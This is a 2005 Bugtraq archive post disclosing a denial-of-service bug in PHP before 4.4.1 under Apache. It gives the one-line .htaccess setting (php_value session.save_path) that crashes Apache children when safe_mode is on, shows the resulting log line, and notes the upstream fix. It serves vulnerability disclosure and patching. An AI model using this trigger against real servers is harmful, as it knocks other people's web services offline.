Bugtraq mailing list archives
php < 4.4.1 htaccess apache dos
From: "Eric Romang / ZATAZ.com" <exploits () zataz net>
Date: Mon, 24 Oct 2005 09:36:38 +0200
Hello, Here under some stuff to dos apache + php just through an htaccess. * With .htaccess method : If you have into your php.ini -> safe_mode = On Simply put a .htaccess file on the root directory of your website with this content : php_value session.save_path /var/www/somewherehowexist Apache segfault with :[Fri Sep 30 10:33:11 2005] [notice] child pid 17743 exit signal Trace/breakpoint trap (5)
There was a bug in the apache2handler SAPI, sapi_apache2.c file, that made this segfault here possible, the bug now is fixed upstream and 5.1.0 final, 4.4.1 final and the next 5.0.X release will have the patch.
Also work with session.save_path into a VirtualHost. Gentoo bug report : http://bugs.gentoo.org/show_bug.cgi?id=107602 and http://bugs.gentoo.org/show_bug.cgi?id=98871 Regards.
Current thread:
- php < 4.4.1 htaccess apache dos Eric Romang / ZATAZ.com (Oct 24)